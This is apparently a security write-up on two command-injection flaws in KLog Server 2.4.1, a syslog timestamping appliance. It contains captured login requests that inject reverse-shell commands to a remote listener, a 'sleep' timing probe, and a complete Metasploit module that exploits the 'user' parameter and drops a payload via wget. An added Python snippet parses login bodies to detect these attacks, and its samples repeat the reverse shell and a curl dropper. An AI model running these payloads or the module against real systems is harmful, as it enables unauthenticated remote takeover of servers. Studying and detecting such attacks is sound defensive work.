CVE-2020-35729
KLog Server 2.4.1 allows OS command injection via shell metacharacters in the user parameter of actions/authenticate.php.
CVE-2021-3317
KLog Server through 2.4.1 allows authenticated command injection: async.php calls shell_exec() on the original value of the source parameter.
What is KLog Server?
KLog Server is a Syslog server that provides a timestamping service in accordance with Law No. 5651. It is delivered as a Linux-based virtual machine compatible with VMware and Microsoft Hyper-V, and is said to work integrated with any device (firewalls, servers, etc.) that produces logs over the Syslog protocol.
What is Syslog?
Syslog is the standard log generation and collection facility used on Unix-like systems: programs emit log messages and a syslog daemon stores or forwards them.
Attack example
In the first step, the "%26sleep+5%26" payload is sent and executed on the target KLog server; the delayed response confirms that the injected command runs.
Next, the exploit shown in the screenshot below is run to automate the reverse-shell connection, and it can be confirmed that shell commands execute successfully over the listening nc connection.
Collected attack payload samples (captured requests)
POST /actions/authenticate.php HTTP/1.1
pswd=test&user=test"&bash -i >& /dev/tcp/111.222.333.444/9999 0>&1
POST /actions/authenticate.php HTTP/1.1
pswd=test&user=test"&bash -i >& /dev/tcp/localhost/9999 0>&1
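From the defender's side, the following is an added example (not code from the original post or from Klog Server) that parses captured login POST bodies the way PHP fills $_POST and flags the request shapes shown above; the endpoint and the field names user and pswd come from the post, while the sample bodies and host names are constructed.

```python
"""Flag CVE-2020-35729 attempts in captured Klog Server login POST bodies.

Added example, not from the original post or from Klog Server. It assumes only
what the post states: /actions/authenticate.php takes ``user`` and ``pswd`` and
passes ``user`` to shell_exec(). All sample bodies below are constructed."""
import re
from urllib.parse import unquote_plus

EXPECTED_FIELDS = {"user", "pswd"}
# Characters that close a quoted shell argument or chain a second command.
# Deliberately broad for a login field; tune if real usernames contain them.
SHELL_META = re.compile(r'["\'`;&|\n$\\]')
CLASSES = [  # coarse intent labels, checked in this order
    ("reverse-shell", re.compile(r"/dev/tcp/")),
    ("dropper", re.compile(r"\b(curl|wget)\b")),
    ("time-probe", re.compile(r"\bsleep\s+\d+")),
]

def parse_form(body):
    """Split a body as PHP fills $_POST: '&' separates pairs, '=' splits name
    from value, then both are URL-decoded. A pair without '=' becomes a name
    with an empty value, which is how a literal '&bash ...' shows up."""
    fields = {}
    for seg in body.split("&"):
        if seg:
            name, _, value = seg.partition("=")
            fields[unquote_plus(name)] = unquote_plus(value)
    return fields

def analyze_body(body):
    """Return None for a clean login, else a dict describing the attempt."""
    fields = parse_form(body)
    user = fields.get("user", "")
    stray = [k for k in fields if k not in EXPECTED_FIELDS]
    if not SHELL_META.search(user) and not stray:
        return None
    # Rebuild what the shell would have seen: the user value plus any stray
    # pairs that a literal '&' split off the injected command.
    shell_text = " ".join([user] + stray)
    kind = next((k for k, rx in CLASSES if rx.search(shell_text)), "unknown")
    return {"kind": kind, "user": user, "stray_fields": stray}

# Constructed samples: benign login, then sleep probe, reverse shell, dropper.
SAMPLES = [
    "user=admin&pswd=Summer2021",
    "user=unsafe+%22%26sleep+40%26%22&pswd=inline",
    "pswd=test&user=test%22%26bash+-i+%3E%26+%2Fdev%2Ftcp%2F111.222.333.444%2F9999+0%3E%261",
    'pswd=test&user=test"&cd /tmp;curl http://c2-placeholder.example/x -O',
]
```

Because the login form only ever carries two fields, any stray pair or shell metacharacter in user is a strong signal on its own, regardless of which command follows.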
Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
      'Description' => %q{
        This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
        The "user" parameter is executed via the shell_exec() function without input validation.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'B3KC4T', # Vulnerability discovery
          'Metin Yunus Kandemir', # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2020-35729'],
          ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
        ],
      'DefaultOptions' =>
        {
          # The injected command blocks the PHP request, so a short timeout is expected.
          'HttpClientTimeout' => 2,
        },
      'Platform' => [ 'unix', 'linux' ],
      'Arch' => [ ARCH_X64 ],
      'Targets' => [
        ['Klog Server 2.4.1 (x64)', {
          'Platform' => 'linux',
          'Arch' => ARCH_X64,
        }],
      ],
      'Privileged' => false,
      'DisclosureDate' => "2021-01-05",
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
      ]
    )
  end

  # Rewrite the stager command so it survives the injection point.
  # gsub! returns nil when a pattern does not match, so cmd is returned explicitly.
  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
    cmd
  end

  def execute_command(cmd, opts = {})
    command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
    print_status("Sending stager payload...")
    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
      'encode_params' => false, # the payload is already URL-encoded above
      'vars_post' => {
        'user' => command_payload,
        'pswd' => "inline"
      }
    })
    if res && res.code == 302
      print_error("The target is not vulnerable!")
    else
      print_good("The target is vulnerable!")
    end
  end

  # Blind check: an unaffected server answers promptly with a 302 redirect,
  # while a vulnerable one blocks on sleep past HttpClientTimeout, so res is nil.
  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
      'encode_params' => false,
      'vars_post' => {
        'user' => "unsafe+%22%26sleep+40%26%22", # checking blind command injection via sleep
        'pswd' => "inline"
      }
    })
    if res && res.code == 302
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Vulnerable
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 10)
  end
end